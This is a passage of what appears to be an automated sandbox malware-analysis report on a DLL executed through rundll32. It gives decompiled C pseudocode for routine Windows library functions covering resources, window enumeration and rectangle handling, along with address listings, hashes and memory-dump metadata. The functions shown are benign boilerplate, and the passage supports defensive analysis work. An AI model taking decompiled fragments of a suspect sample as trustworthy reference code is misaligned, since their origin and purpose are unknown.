                                                                        • Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000D0B9 Relevance: 6.1, APIs: 4, Instructions: 66COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E1000D03C( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L1000C8E6( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}










                                                                        0x1000d0bd
                                                                        0x1000d0c2
                                                                        0x1000d15d
                                                                        0x1000d15d
                                                                        0x1000d0c9
                                                                        0x1000d0cf
                                                                        0x1000d0e3
                                                                        0x1000d0e3
                                                                        0x1000d0e6
                                                                        0x1000d137
                                                                        0x1000d13d
                                                                        0x1000d13d
                                                                        0x1000d140
                                                                        0x1000d143
                                                                        0x1000d154
                                                                        0x1000d154
                                                                        0x00000000
                                                                        0x1000d15a
                                                                        0x1000d0e8
                                                                        0x1000d0e8
                                                                        0x1000d0e9
                                                                        0x1000d127
                                                                        0x1000d127
                                                                        0x1000d129
                                                                        0x1000d12b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000d130
                                                                        0x00000000
                                                                        0x1000d130
                                                                        0x1000d0eb
                                                                        0x1000d0eb
                                                                        0x1000d0ee
                                                                        0x1000d11f
                                                                        0x00000000
                                                                        0x1000d11f
                                                                        0x1000d0f0
                                                                        0x1000d0f0
                                                                        0x1000d0f1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000d0f3
                                                                        0x1000d0f3
                                                                        0x1000d0f6
                                                                        0x1000d0fe
                                                                        0x1000d103
                                                                        0x1000d106
                                                                        0x1000d108
                                                                        0x1000d111
                                                                        0x1000d111
                                                                        0x1000d117
                                                                        0x1000d117
                                                                        0x00000000
                                                                        0x1000d0f6
                                                                        0x1000d0d1
                                                                        0x1000d0d5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000d0d8
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDestroyFreeSafeTask
                                                                        • String ID:
                                                                        • API String ID: 3253174383-0
                                                                        • Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                        • Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
                                                                        • Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                        • Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000C037 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E1000C037(void* __edi) {
				int _t36;
				void* _t52;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				E10011BF0(0x1003aec3, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = 0;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x10040668;
				_t55 =  *((intOrPtr*)(_t58 + 8));
				 *(_t58 - 4) = 0;
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t58 + 0xc)));
					_t52 = E1002934F();
					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
					_push( *((intOrPtr*)(_t58 + 0x10)));
					if(_t36 != 0) {
						_push(_t52);
						E1000B505( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
						_t56 = 0;
					} else {
						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
					}
				} else {
					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x1003eb6c;
				E100293B4(_t58 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t56;
			}








                                                                        0x1000c03c
                                                                        0x1000c048
                                                                        0x1000c04b
                                                                        0x1000c055
                                                                        0x1000c058
                                                                        0x1000c05b
                                                                        0x1000c06c
                                                                        0x1000c074
                                                                        0x1000c07d
                                                                        0x1000c092
                                                                        0x1000c0a0
                                                                        0x1000c0a8
                                                                        0x1000c0ab
                                                                        0x1000c0c1
                                                                        0x1000c0c2
                                                                        0x1000c0c7
                                                                        0x1000c0ad
                                                                        0x1000c0b4
                                                                        0x1000c0b4
                                                                        0x1000c05d
                                                                        0x1000c067
                                                                        0x1000c067
                                                                        0x1000c0ca
                                                                        0x1000c0d1
                                                                        0x1000c0d8
                                                                        0x1000c0e4
                                                                        0x1000c0ec

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$EqualH_prologIntersect
                                                                        • String ID:
                                                                        • API String ID: 2227276553-0
                                                                        • Opcode ID: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                        • Instruction ID: 4a10622ef6c9ad6aa885a1ca4e3b79ad8472db7afe28fedb0a7e7fe58967940e
                                                                        • Opcode Fuzzy Hash: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                        • Instruction Fuzzy Hash: 19210B7290025DEFDB11DFA4C984D9EBBB8FF08291B11466AF906E7250D731AE11CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100306DB Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t35;
				int _t39;
				void* _t49;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t39, _t21);
				OffsetRect(_t49 + 0x48, _t39, _v8);
				OffsetRect(_t49 + 0x38, _t39, _v8);
				OffsetRect(_t49 + 0x58, _t39, _v8);
				_t51 =  *((intOrPtr*)(_t49 + 0x80));
				 *((intOrPtr*)(_t49 + 4)) = _a4;
				 *((intOrPtr*)(_t49 + 8)) = _a8;
				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
					_t35 = E100301DC();
				} else {
					_t35 = 0;
				}
				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
				return E10030582(_t49, _t51, 0);
			}








                                                                        0x100306de
                                                                        0x100306df
                                                                        0x100306e5
                                                                        0x100306ed
                                                                        0x100306f9
                                                                        0x100306fc
                                                                        0x10030704
                                                                        0x1003070f
                                                                        0x1003071a
                                                                        0x10030725
                                                                        0x10030727
                                                                        0x10030731
                                                                        0x10030737
                                                                        0x1003073a
                                                                        0x10030742
                                                                        0x1003073c
                                                                        0x1003073c
                                                                        0x1003073c
                                                                        0x1003074b
                                                                        0x10030757

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 177026234-0
                                                                        • Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                        • Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
                                                                        • Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                        • Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001EFFC Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1001EFFC(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E100373B5() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}











                                                                        0x1001efff
                                                                        0x1001f003
                                                                        0x1001f00c
                                                                        0x1001f00f
                                                                        0x1001f012
                                                                        0x1001f019
                                                                        0x1001f030
                                                                        0x1001f030
                                                                        0x1001f037
                                                                        0x1001f042
                                                                        0x1001f042
                                                                        0x1001f046
                                                                        0x1001f049
                                                                        0x1001f051
                                                                        0x1001f053
                                                                        0x1001f062
                                                                        0x1001f066
                                                                        0x1001f055
                                                                        0x1001f055
                                                                        0x1001f058
                                                                        0x1001f05c
                                                                        0x1001f05c
                                                                        0x1001f06f
                                                                        0x1001f07b
                                                                        0x1001f07b
                                                                        0x1001f06f
                                                                        0x1001f081
                                                                        0x1001f086
                                                                        0x1001f086
                                                                        0x1001f092

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1001F02A
                                                                        • LockResource.KERNEL32(00000000), ref: 1001F03C
                                                                        • FreeResource.KERNEL32(00000000), ref: 1001F086
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                        • Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
                                                                        • Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                        • Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100257A8 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E100257A8(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t9;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t35;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				_t9 = E1001F77E(0x10);
				_t36 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10025742(_t9, _t36, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}











                                                                        0x100257a8
                                                                        0x100257ab
                                                                        0x100257b0
                                                                        0x100257b2
                                                                        0x100257b7
                                                                        0x100257ba
                                                                        0x100257c9
                                                                        0x100257c9
                                                                        0x100257bc
                                                                        0x100257c5
                                                                        0x100257c5
                                                                        0x100257cb
                                                                        0x100257dc
                                                                        0x100257ee
                                                                        0x100257f2
                                                                        0x100257fa
                                                                        0x100257fa
                                                                        0x10025807
                                                                        0x10025807
                                                                        0x1002580f
                                                                        0x10025815
                                                                        0x1002581d

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 100257E5
                                                                        • GetLastError.KERNEL32(?), ref: 10025800
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                        • String ID:
                                                                        • API String ID: 3907606552-0
                                                                        • Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                        • Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
                                                                        • Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                        • Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001D8A6 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t20;
				struct HWND__* _t21;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t20 = GetParent(_t24);
					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t21 = E10029C98(_t24, _v12.x, _v12.y);
						if(_t21 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t21);
							_t9 = _t21;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t20;
					}
				}
				return _t9;
			}











                                                                        0x1001d8ab
                                                                        0x1001d8b1
                                                                        0x1001d8b4
                                                                        0x1001d8b7
                                                                        0x1001d8ba
                                                                        0x1001d8bd
                                                                        0x1001d8c3
                                                                        0x1001d8c7
                                                                        0x1001d8d1
                                                                        0x1001d8d5
                                                                        0x1001d8ec
                                                                        0x1001d8fe
                                                                        0x1001d902
                                                                        0x1001d911
                                                                        0x1001d911
                                                                        0x1001d904
                                                                        0x1001d905
                                                                        0x1001d90d
                                                                        0x1001d90f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d90f
                                                                        0x1001d8e3
                                                                        0x1001d8e3
                                                                        0x1001d8e3
                                                                        0x1001d913
                                                                        0x1001d916

                                                                        APIs
                                                                        • WindowFromPoint.USER32(?,?), ref: 1001D8BD
                                                                        • GetParent.USER32(00000000), ref: 1001D8CB
                                                                        • ScreenToClient.USER32 ref: 1001D8EC
                                                                        • IsWindowEnabled.USER32(00000000), ref: 1001D905
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientEnabledFromLongParentPointScreen
                                                                        • String ID:
                                                                        • API String ID: 2204725058-0
                                                                        • Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                        • Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
                                                                        • Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                        • Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022B16 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 62%
                                                                        			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E10022115();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E1002283F();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}







                                                                        0x10022b24
                                                                        0x10022b87
                                                                        0x10022b87
                                                                        0x10022b8b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022b2c
                                                                        0x10022b56
                                                                        0x10022b2e
                                                                        0x10022b2e
                                                                        0x10022b2f
                                                                        0x10022b36
                                                                        0x10022b38
                                                                        0x10022b3b
                                                                        0x10022b3e
                                                                        0x10022b41
                                                                        0x10022b44
                                                                        0x10022b45
                                                                        0x10022b45
                                                                        0x10022b36
                                                                        0x10022b60
                                                                        0x10022b79
                                                                        0x10022b79
                                                                        0x10022b81
                                                                        0x10022b81
                                                                        0x10022b90

                                                                        APIs
                                                                        • GetTopWindow.USER32(?), ref: 10022B24
                                                                        • GetTopWindow.USER32(00000000), ref: 10022B63
                                                                        • GetWindow.USER32(00000000,00000002), ref: 10022B81
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window
                                                                        • String ID:
                                                                        • API String ID: 2353593579-0
                                                                        • Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                        • Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
                                                                        • Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                        • Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022422 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t13;
				struct HWND__* _t15;
				struct HWND__* _t16;
				void* _t17;

				_t13 = __ecx;
				_t15 = GetDlgItem(_a4, _a8);
				if(_t15 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t16 = _t10;
						if(_t16 == 0) {
							goto L10;
						}
						_t10 = E10022422(_t13, _t16, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t16, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t15) == 0) {
						L3:
						_push(_t15);
						if(_a12 == 0) {
							return E100220EE(_t17);
						}
						_t10 = E10022115();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10022422(_t13, _t15, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}









                                                                        0x10022422
                                                                        0x10022439
                                                                        0x1002243d
                                                                        0x1002246d
                                                                        0x10022470
                                                                        0x1002248d
                                                                        0x1002248d
                                                                        0x10022491
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002247b
                                                                        0x10022482
                                                                        0x10022487
                                                                        0x00000000
                                                                        0x10022487
                                                                        0x00000000
                                                                        0x10022482
                                                                        0x1002243f
                                                                        0x10022444
                                                                        0x10022456
                                                                        0x1002245a
                                                                        0x1002245b
                                                                        0x00000000
                                                                        0x1002245d
                                                                        0x10022464
                                                                        0x1002246b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022446
                                                                        0x1002244d
                                                                        0x10022454
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022454
                                                                        0x10022444
                                                                        0x10022496
                                                                        0x10022496

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 1002242D
                                                                        • GetTopWindow.USER32(00000000), ref: 10022440
                                                                          • Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487
                                                                        • GetTopWindow.USER32(?), ref: 10022470
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item
                                                                        • String ID:
                                                                        • API String ID: 369458955-0
                                                                        • Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                        • Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
                                                                        • Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                        • Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B47F Relevance: 6.0, APIs: 4, Instructions: 48registryCOMMON
